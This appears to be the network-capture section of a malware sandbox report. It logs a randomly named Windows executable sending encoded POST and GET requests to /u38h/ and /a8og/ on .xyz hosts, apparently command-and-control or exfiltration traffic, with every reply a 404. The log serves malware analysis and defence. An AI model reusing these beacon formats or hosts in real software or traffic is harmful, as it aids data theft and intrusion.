

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.104997765.21.196.90806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:39.586091995 CEST782OUTPOST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 76 59 5a 6b 74 33 6a 65 70 4d 38 4b 70 47 61 63 77 78 76 50 6c 4d 6b 2f 53 37 6e 73 66 41 4d 52 6b 6b 38 55 33 54 76 50 76 6b 2b 6e 33 78 47 50 6a 4d 6d 48 31 47 32 4a 6d 33 2b 45 53 54 66 54 55 68 64 66 36 5a 41 79 73 2b 6d 6a 53 6a 41 35 32 69 57 4b 46 4e 2f 4d 44 42 4e 5a 5a 72 6c 54 64 33 73 75 6f 63 31 58 6f 66 59 5a 63 5a 7a 77 33 48 72 53 73 6e 72 70 31 33 2f 61 67 71 58 41 63 77 51 52 54 56 71 63 57 44 6a 45 67 52 75 6a 44 55 75 37 71 35 4d 6c 48 33 7a 42 48 59 43 55 48 56 6f 74 75 58 48 53 65 69 66 50 74 6b 4d 76 61 44 56 53 30 43 2f 4d 74 58 6e 30
                                                                  Data Ascii: EZ2lo=vYZkt3jepM8KpGacwxvPlMk/S7nsfAMRkk8U3TvPvk+n3xGPjMmH1G2Jm3+ESTfTUhdf6ZAys+mjSjA52iWKFN/MDBNZZrlTd3suoc1XofYZcZzw3HrSsnrp13/agqXAcwQRTVqcWDjEgRujDUu7q5MlH3zBHYCUHVotuXHSeifPtkMvaDVS0C/MtXn0
                                                                  Oct 7, 2024 10:38:40.233946085 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:40 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.104997865.21.196.90806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:42.136537075 CEST806OUTPOST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 76 59 5a 6b 74 33 6a 65 70 4d 38 4b 72 6e 71 63 32 57 62 50 69 73 6b 2b 65 62 6e 73 56 67 4d 56 6b 6b 67 55 33 53 37 35 76 58 57 6e 33 51 32 50 69 4e 6d 48 32 47 32 4a 74 58 2b 42 63 7a 66 69 55 68 41 38 36 63 67 79 73 2b 61 6a 53 6a 77 35 32 78 2b 4a 66 39 2f 4b 57 78 4e 66 57 4c 6c 54 64 33 73 75 6f 63 78 74 6f 66 41 5a 63 74 33 77 32 69 66 52 77 33 72 6f 79 33 2f 61 6b 71 58 62 63 77 52 43 54 58 4f 79 57 41 62 45 67 51 65 6a 44 41 36 36 68 35 4d 72 4c 6e 7a 55 4f 72 72 77 64 51 59 2f 75 30 76 34 4b 69 50 6d 6a 6c 74 6f 4c 53 30 46 6e 31 6a 43 6a 52 53 65 6e 55 44 4e 6b 47 39 35 49 45 67 54 5a 50 45 45 61 4b 2f 72 36 77 3d 3d
                                                                  Data Ascii: EZ2lo=vYZkt3jepM8Krnqc2WbPisk+ebnsVgMVkkgU3S75vXWn3Q2PiNmH2G2JtX+BczfiUhA86cgys+ajSjw52x+Jf9/KWxNfWLlTd3suocxtofAZct3w2ifRw3roy3/akqXbcwRCTXOyWAbEgQejDA66h5MrLnzUOrrwdQY/u0v4KiPmjltoLS0Fn1jCjRSenUDNkG95IEgTZPEEaK/r6w==
                                                                  Oct 7, 2024 10:38:42.783889055 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:42 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.104997965.21.196.90806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:44.680650949 CEST1819OUTPOST /u38h/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  Origin: http://www.030002304.xyz
                                                                  Referer: http://www.030002304.xyz/u38h/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 76 59 5a 6b 74 33 6a 65 70 4d 38 4b 72 6e 71 63 32 57 62 50 69 73 6b 2b 65 62 6e 73 56 67 4d 56 6b 6b 67 55 33 53 37 35 76 58 4f 6e 33 47 71 50 6a 75 65 48 33 47 32 4a 75 58 2b 41 63 7a 66 46 55 68 49 67 36 63 6c 4a 73 37 57 6a 54 41 49 35 6e 77 2b 4a 4b 74 2f 4b 4a 68 4e 65 5a 72 6c 38 64 33 38 71 6f 63 42 74 6f 66 41 5a 63 73 48 77 67 48 72 52 67 48 72 70 31 33 2f 4f 67 71 57 30 63 78 30 33 54 58 4b 4d 57 78 37 45 35 77 4f 6a 45 7a 53 36 73 35 4d 2b 49 6e 79 52 4f 72 33 76 64 55 34 56 75 31 62 53 4b 67 66 6d 67 51 67 79 53 43 49 70 35 32 2f 5a 76 51 32 42 76 42 66 62 74 46 35 2f 41 33 77 32 61 37 55 4b 4a 35 43 43 68 52 71 6f 57 39 35 42 79 63 34 36 34 6e 50 66 62 51 44 70 39 5a 4b 4c 74 70 5a 2b 61 37 36 39 44 49 54 72 30 59 64 51 2b 76 33 35 51 75 33 50 31 4b 79 35 46 63 7a 6a 44 66 7a 69 2b 58 44 44 6c 46 78 78 47 61 37 6d 34 77 53 61 44 59 39 34 71 67 4a 42 43 4b 7a 70 57 76 38 48 63 33 4b 58 4d 5a 61 47 70 61 53 2b 59 51 52 6b 51 4f 49 7a 35 48 4a 43 6e 6f 48 73 49 32 53 6f [TRUNCATED]
                                                                  Data Ascii: EZ2lo=vYZkt3jepM8Krnqc2WbPisk+ebnsVgMVkkgU3S75vXOn3GqPjueH3G2JuX+AczfFUhIg6clJs7WjTAI5nw+JKt/KJhNeZrl8d38qocBtofAZcsHwgHrRgHrp13/OgqW0cx03TXKMWx7E5wOjEzS6s5M+InyROr3vdU4Vu1bSKgfmgQgySCIp52/ZvQ2BvBfbtF5/A3w2a7UKJ5CChRqoW95Byc464nPfbQDp9ZKLtpZ+a769DITr0YdQ+v35Qu3P1Ky5FczjDfzi+XDDlFxxGa7m4wSaDY94qgJBCKzpWv8Hc3KXMZaGpaS+YQRkQOIz5HJCnoHsI2So4i3JVK98aT/AGEAnHkHP65bhkec0hrVulgR0Kn1gyrl+Ek9z9g/ww/A5Ws5qXz0JUMledur0M5rjrXsojM7AZPF65VYvvfw4PypPpLPXf8rqz8TQBVqkTm+76rSErKk41uIDSyBWHOo4wWL6MC8CM+RDgevMmhArdEX5sYZtgPYlsGlj/OfswBrN44BLRpL22LHIEglkB6sMfF9aJzkGLpeYcQE+mkEZVcxn+XuEFo4IRQk7TKPANb/Wvx2sweKhs/fcDjG+6m63YSxQNjG3qC99+xcbiXMikdvtIvoSnvY8VwOX+SVKT+/qijGLZxQRRexA82Tay1b6inKLEeUY8QA9Z1SrHrnWxlE4xATqEQ6lfDzN6ORR20IFQ+6taf8zBETvq8GI4A1PyLvTE4Yrqj2wi+khERwUGKkGOuKC1nTBHaAbSvKMUY2GosY3n8Wkx2b71SgilwkwWrcHNZgQxHO0KJ3yH/LjJnmocTEPIQgSbtz4aiwjIPZAcfE2wwNz7AaZz26ccCeVVV9Cm6fh429e4Y/p4hqqAlG61V3Ot3iV3fmfZJeYIsIs+iyc/AU1psvAL8LDsW8nZDUqJkySp4W73hj111sv1Xk1uoHrDu1hSgy0tGSMa8RhlSYtj7781J9mRzBsa8z1ZizVqLFT1weDVOFA6oFlai [TRUNCATED]
                                                                  Oct 7, 2024 10:38:45.357409954 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:45 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.104998065.21.196.90806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:47.224376917 CEST516OUTGET /u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.030002304.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:38:48.458664894 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                  Oct 7, 2024 10:38:48.459136963 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                  Oct 7, 2024 10:38:48.829121113 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Mon, 07 Oct 2024 08:38:47 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.1049981162.0.238.246806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:53.661032915 CEST773OUTPOST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 31 37 4a 35 43 36 51 56 7a 58 41 37 74 46 4a 6a 6a 4b 4a 4d 78 62 48 6d 55 64 4c 37 49 38 50 41 4a 37 32 4d 67 53 74 61 6d 72 68 36 67 67 37 37 64 6b 38 6a 33 32 49 49 54 6e 70 66 6c 77 4c 47 78 67 39 42 38 32 48 59 64 45 6b 4d 73 45 44 70 39 50 43 63 77 31 44 6a 69 76 4d 2f 2f 66 43 49 6e 6a 4e 4d 31 59 6d 4c 2f 35 6a 35 36 74 73 68 77 4d 62 7a 41 69 53 53 59 4a 4a 53 64 38 37 48 39 32 4e 31 58 45 64 49 67 69 63 4f 4f 46 7a 58 72 7a 57 45 5a 65 45 55 45 68 45 54 49 6b 4e 31 65 7a 6f 54 78 50 72 59 4e 30 6e 32 31 62 48 73 72 62 31 54 36 51 34 2b 31 64 37
                                                                  Data Ascii: EZ2lo=317J5C6QVzXA7tFJjjKJMxbHmUdL7I8PAJ72MgStamrh6gg77dk8j32IITnpflwLGxg9B82HYdEkMsEDp9PCcw1DjivM//fCInjNM1YmL/5j56tshwMbzAiSSYJJSd87H92N1XEdIgicOOFzXrzWEZeEUEhETIkN1ezoTxPrYN0n21bHsrb1T6Q4+1d7
                                                                  Oct 7, 2024 10:38:54.248193979 CEST595INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:54 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
